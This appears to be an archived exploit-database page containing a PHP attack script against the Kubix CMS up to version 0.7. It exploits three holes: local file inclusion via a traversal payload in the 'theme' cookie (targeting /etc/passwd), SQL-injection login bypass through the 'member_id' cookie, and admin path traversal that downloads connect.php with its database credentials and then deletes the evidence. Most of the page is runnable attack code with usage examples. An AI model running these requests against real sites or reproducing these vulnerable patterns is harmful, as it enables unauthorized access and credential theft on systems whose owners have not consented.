Kubix <= 0.7 Multiple Remote Vulnerabilities Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kubix <= 0.7 Multiple Remote Vulnerabilities Exploit
# Published : 2006-11-29
# Author : BlackHawk
# Previous Title : Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability
# Next Title : b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Include Vulnerability
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "rn";
echo "Kubix <=0.7 Multiple Vulnerabilities Exploitrn";
echo "Site: http://www.kubixproject.netrn";
echo "Dork: Powered by: Kubixrn";
echo "by BlackHawk <hawkgotyou@gmail.com>rn";
echo "Thanks to rgod for the php code and Marty for the Lovernrn";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Relatedrn";
echo "Host:		target server (ip/hostname)rn";
echo "Path:		path to Kubixrn";
echo "AttackType:	1 - Local File Inclusion (mq=off)rn";
echo "		  |-> Related: path of the file to includern";
echo "		  |-> Es: php ".$argv[0]." localhost /kubix/ 1 ../../../../../etc/passwdrnrn";
echo "		2 - Login Bypass (PoC)rn";
echo "		  |-> Related: Valid User ID (do nothing.. only to show how does it works)rn";
echo "		  |-> Es: php ".$argv[0]." localhost /kubix/ 2 1rnrn";
echo "		3 - Download connect.php filern";
echo "		  |-> Related: Valid Admin User IDrn";
echo "		  |-> Es: php ".$argv[0]." localhost /kubix/ 3 1rnrn";
echo "";
echo "rn";
echo "";
die;
}

/*
There are some critical vulnerabilities in this quite pretty CMS..

Vuln N° 1 - Local File Inclusion:

vuln file: includes/head.php
code:
------
if(isset($_COOKIE['theme']) && $_COOKIE['theme'] != "")
{
	$default_theme = $_COOKIE['theme'];
}
[...]
include "themes/$default_theme/header.php";
?>
------

attacker can execute a LocalFile by setting the 'theme' cookie value properly;
Es: ../../../../../../etc/passwd%00
Becasuse of the last null char this one works only with MQ=off


Vuln N° 2 - Login Bypass:

vuln file: includes/functions.php
code:
------
// If the member_id cookie is set...
if(isset($_COOKIE['member_id']) && $_COOKIE['member_id'] != 0 && $_COOKIE['member_id'] != "")
{
	$id = $_COOKIE['member_id'];
	$pass_hash = $_COOKIE['pass_hash'];

	$sql = mysql_query("SELECT name FROM $members WHERE id = $id AND member_login_key = '$pass_hash'");
	$numrows = mysql_num_rows($sql);

	if($numrows != 1)
	{
		$isLoggedIn = "";
	}
	else
	{
		$isLoggedIn = 1;
	}
}
------
Attacker can Bypass login by setting 'member_id' cookie value properly and making a SQL Injection attack;

Es: 1--

Vuln N° 3 - connect.php (or what you want) file download:

vuln file: includes/adm/add_dl.php
code:
------
if(isset($_POST['Submit']) && $_POST['title'] != "" && $_POST['file'] != "" && $_POST['desc'] != "")
	{
		$title = $_POST['title'];
		$file = $_POST['file'];
		$desc = $_POST['desc'];
		$cat = $_POST['cats'];
		
		if(file_exists("Downloads/$file"))
		{
			mysql_query("INSERT INTO kbx_downloads (cat, name, `desc`, `file`) VALUES('$cat', '$title', '$desc', '$file')");
			echo '<div class="container center">Download added!<br />Redirecting...</div>';
			echo '<meta http-equiv="refresh" content="1;url=adm_index.php?mod=edit_dl">';
		}
		else
		{
			echo '<div class="alert">File Doesnt Exist!</div>';
			echo '<meta http-equiv="refresh" content="1;url=adm_index.php?mod=add_dl">';
		}
	}
------
Attacker with a valid Admin ID can send a malicious file name to download connect.php;
Es: ../includes/connect.php


Started programming: 15.37 28/11/2006
Ended:


sorry for my bad english but i've done it quicly cause Prof. Da Forno probably will defenestrate me in latin tomorrow :D

BlackHawk <hawkgotyou@gmail.com>
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
  }
 return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";


if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

switch($attack_type)
{
case 1: //Local file inclusion
$file_inc=$argv[4];
for ($i=5; $i<=$argc-1; $i++){
$file_inc.=" ".$argv[$i];
}
$file_inc = urlencode($file_inc).'%00';
echo "Attack No 1 - Local File Inclusionrn";
echo "-- Start of Result--rn";
$packet ="GET ".$p."index.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: theme=".$file_inc.";rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacketii($packet);
echo $html;
echo "rn-- End of Result--";
break;

case 2: // Login Bypass
$usr_id=$argv[4];
echo "Attack No 2 - Login Bypassrn";
$packet ="GET ".$p."index.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: member_id=".$usr_id."--;rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
echo "Logged in.. But this is just a PoC..";
break;

break;
case 3: // connect.php download
$usr_id=$argv[4];
$data="title=DaForno_Imperat";
$data.="&file=../includes/connect.php";
$data.="&desc=BlackHawk_Rulez";
$data.="&Submit=Submit";
$packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0rn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*rn";
$packet.="Referer: http://".$host.$path."/blog.phprn";
$packet.="Accept-Language: itrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: member_id=".$usr_id."--;rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cache-Control: no-cachernrn";
$packet.=$data;
sendpacketii($packet);
$valid_id=0;

for ($i=0; $i<=50; $i++){
$packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: member_id=".$usr_id."--;rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
if (strstr($html,"DaForno_Imperat"))
{
$valid_id=$i;
}
}
$packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: member_id=".$usr_id."--;rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
$temp=explode("<?PHP",$html);
$temp2=explode("?>",$temp[1]);
echo "<?PHPrn".$temp2[0]."rn?>";
$packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: member_id=".$usr_id."--;rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
echo "rnrnrnAll Done.. Enjoy..";
break;
}
?>

# www.Syue.com [2006-11-29]